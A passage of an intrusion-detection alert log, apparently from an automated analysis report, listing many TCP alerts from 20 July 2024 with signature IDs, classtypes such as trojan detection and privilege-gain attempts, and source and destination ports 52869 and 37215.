                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570741
                      SID:2027339
                      Source Port:38532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2829579
                      Source Port:38620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.223856
                      SID:2027339
                      Source Port:39922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449942
                      SID:2831300
                      Source Port:44274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.435146
                      SID:2025132
                      Source Port:46886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2835222
                      Source Port:35312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.199749
                      SID:2027339
                      Source Port:50784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.199501
                      SID:2025132
                      Source Port:54394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.560327
                      SID:2027339
                      Source Port:45206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.565815
                      SID:2027339
                      Source Port:47572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.935568
                      SID:2027339
                      Source Port:39836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.216515
                      SID:2027339
                      Source Port:35800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.712957
                      SID:2025132
                      Source Port:40334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.303495
                      SID:2025132
                      Source Port:40018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.651872
                      SID:2027339
                      Source Port:58358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.824929
                      SID:2831300
                      Source Port:37196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.310523
                      SID:2025132
                      Source Port:48160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.208973
                      SID:2025132
                      Source Port:41300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.186768
                      SID:2025132
                      Source Port:50582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.387430
                      SID:2835222
                      Source Port:47912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:37.315997
                      SID:2027339
                      Source Port:59550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.352367
                      SID:2027339
                      Source Port:39010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.748553
                      SID:2829579
                      Source Port:51182
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.583817
                      SID:2025132
                      Source Port:52868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:49.853581
                      SID:2831300
                      Source Port:40940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.211354
                      SID:2025132
                      Source Port:50532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.958429
                      SID:2027339
                      Source Port:33640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.187903
                      SID:2025132
                      Source Port:37684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.327041
                      SID:2027339
                      Source Port:59436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2835222
                      Source Port:42576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462432
                      SID:2831300
                      Source Port:48576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.430092
                      SID:2831300
                      Source Port:58444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.997059
                      SID:2831300
                      Source Port:39064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.537891
                      SID:2831300
                      Source Port:38312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.557113
                      SID:2831300
                      Source Port:38632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2835222
                      Source Port:36774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.290948
                      SID:2831300
                      Source Port:57554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.480449
                      SID:2027339
                      Source Port:51664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.368314
                      SID:2025132
                      Source Port:40808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.098635
                      SID:2025132
                      Source Port:49582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.053184
                      SID:2027339
                      Source Port:57480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.472951
                      SID:2831300
                      Source Port:44760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.187455
                      SID:2025132
                      Source Port:60670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2829579
                      Source Port:57374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.864515
                      SID:2025132
                      Source Port:49328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.476343
                      SID:2027339
                      Source Port:57516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.539655
                      SID:2831300
                      Source Port:54220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.540063
                      SID:2027339
                      Source Port:40402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.699362
                      SID:2027339
                      Source Port:60110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.121675
                      SID:2027339
                      Source Port:33358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.524010
                      SID:2835222
                      Source Port:53326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.017538
                      SID:2831300
                      Source Port:46932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.597370
                      SID:2027339
                      Source Port:40440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.415863
                      SID:2025132
                      Source Port:33918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.584797
                      SID:2027339
                      Source Port:56384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2829579
                      Source Port:55632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.404197
                      SID:2025132
                      Source Port:36786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.459685
                      SID:2027339
                      Source Port:52484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.955037
                      SID:2831300
                      Source Port:33434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.535822
                      SID:2025132
                      Source Port:49902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2835222
                      Source Port:44670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.461168
                      SID:2831300
                      Source Port:54098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.787088
                      SID:2025132
                      Source Port:41078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.359635
                      SID:2025132
                      Source Port:38086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.497165
                      SID:2831300
                      Source Port:42590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.881095
                      SID:2025132
                      Source Port:56564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.216294
                      SID:2027339
                      Source Port:52258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.879269
                      SID:2025132
                      Source Port:50884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2025132
                      Source Port:35966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2829579
                      Source Port:39350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.794030
                      SID:2027339
                      Source Port:48668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.803048
                      SID:2025132
                      Source Port:45114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.438363
                      SID:2829579
                      Source Port:45252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.929116
                      SID:2025132
                      Source Port:46580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.592911
                      SID:2027339
                      Source Port:52384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.638173
                      SID:2025132
                      Source Port:39904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.441224
                      SID:2831300
                      Source Port:56242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.327654
                      SID:2025132
                      Source Port:59384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.576576
                      SID:2027339
                      Source Port:56204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.159645
                      SID:2025132
                      Source Port:33802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.686896
                      SID:2027339
                      Source Port:40980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.955933
                      SID:2831300
                      Source Port:33746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.635775
                      SID:2027339
                      Source Port:34116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.367262
                      SID:2829579
                      Source Port:43460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.746633
                      SID:2025132
                      Source Port:54162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.246694
                      SID:2027339
                      Source Port:45684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.062924
                      SID:2829579
                      Source Port:45326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.434236
                      SID:2027339
                      Source Port:34740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.435630
                      SID:2831300
                      Source Port:43096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.815872
                      SID:2027339
                      Source Port:60194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:34.258673
                      SID:2831300
                      Source Port:49322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.767606
                      SID:2027339
                      Source Port:40178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.197560
                      SID:2025132
                      Source Port:60184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.577316
                      SID:2829579
                      Source Port:57132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2835222
                      Source Port:40452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2835222
                      Source Port:58436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.492873
                      SID:2025132
                      Source Port:50612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.720996
                      SID:2027339
                      Source Port:42066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.842190
                      SID:2027339
                      Source Port:38162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.421092
                      SID:2027339
                      Source Port:37374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.575727
                      SID:2831300
                      Source Port:60300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.426258
                      SID:2027339
                      Source Port:54698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.055828
                      SID:2025132
                      Source Port:51382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.898445
                      SID:2027339
                      Source Port:51044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.905402
                      SID:2025132
                      Source Port:46138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.106479
                      SID:2831300
                      Source Port:53776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2835222
                      Source Port:45368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2835222
                      Source Port:37912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2027339
                      Source Port:36470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2829579
                      Source Port:49822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.062924
                      SID:2835222
                      Source Port:43510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.644841
                      SID:2835222
                      Source Port:60454
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994605
                      SID:2025132
                      Source Port:34114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.257816
                      SID:2829579
                      Source Port:56776
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.154110
                      SID:2831300
                      Source Port:59262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.224583
                      SID:2831300
                      Source Port:41930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.343632
                      SID:2829579
                      Source Port:48312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.880262
                      SID:2831300
                      Source Port:59564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.638173
                      SID:2027339
                      Source Port:56008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.139140
                      SID:2027339
                      Source Port:43356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.058070
                      SID:2835222
                      Source Port:56232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.660344
                      SID:2835222
                      Source Port:43332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.486123
                      SID:2027339
                      Source Port:50104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.501893
                      SID:2025132
                      Source Port:54978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.447263
                      SID:2027339
                      Source Port:60964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.982491
                      SID:2027339
                      Source Port:47852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.728529
                      SID:2027339
                      Source Port:33502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.982337
                      SID:2831300
                      Source Port:58740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.682267
                      SID:2025132
                      Source Port:49086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2835222
                      Source Port:52560
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2829579
                      Source Port:49052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.939710
                      SID:2027339
                      Source Port:35850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.102064
                      SID:2027339
                      Source Port:53196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.467143
                      SID:2025132
                      Source Port:46694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:32.610184
                      SID:2027339
                      Source Port:33262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.983376
                      SID:2831300
                      Source Port:53304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.147952
                      SID:2025132
                      Source Port:50690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.449219
                      SID:2027339
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.410737
                      SID:2025132
                      Source Port:46064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.759260
                      SID:2027339
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2829579
                      Source Port:54656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625707
                      SID:2829579
                      Source Port:54276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.530370
                      SID:2025132
                      Source Port:38884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.139088
                      SID:2831300
                      Source Port:43540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2829579
                      Source Port:35550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:23.347168
                      SID:2027339
                      Source Port:53288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.437928
                      SID:2025132
                      Source Port:59544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.610603
                      SID:2027339
                      Source Port:43604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2829579
                      Source Port:42778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.602853
                      SID:2025132
                      Source Port:36134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.981370
                      SID:2025132
                      Source Port:43754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.088545
                      SID:2829579
                      Source Port:53992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330643
                      SID:2027339
                      Source Port:58960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.159681
                      SID:2027339
                      Source Port:46740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.518359
                      SID:2831300
                      Source Port:55530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.452253
                      SID:2027339
                      Source Port:58282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2829579
                      Source Port:41124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.469321
                      SID:2027339
                      Source Port:47036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.224363
                      SID:2027339
                      Source Port:60498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:01.438133
                      SID:2025132
                      Source Port:59368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2835222
                      Source Port:60662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.219202
                      SID:2027339
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2835222
                      Source Port:38516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412131
                      SID:2835222
                      Source Port:54002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.592012
                      SID:2025132
                      Source Port:40242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.422168
                      SID:2027339
                      Source Port:37268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.137886
                      SID:2027339
                      Source Port:59526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.773172
                      SID:2835222
                      Source Port:52742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.427852
                      SID:2025132
                      Source Port:40526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.664505
                      SID:2831300
                      Source Port:45186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2835222
                      Source Port:51574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.664506
                      SID:2027339
                      Source Port:39684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.765891
                      SID:2835222
                      Source Port:42848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.313425
                      SID:2025132
                      Source Port:58320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.780457
                      SID:2027339
                      Source Port:51776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.148720
                      SID:2025132
                      Source Port:35190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.454427
                      SID:2831300
                      Source Port:60172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.499861
                      SID:2831300
                      Source Port:54046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2835222
                      Source Port:32804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.825155
                      SID:2027339
                      Source Port:46698
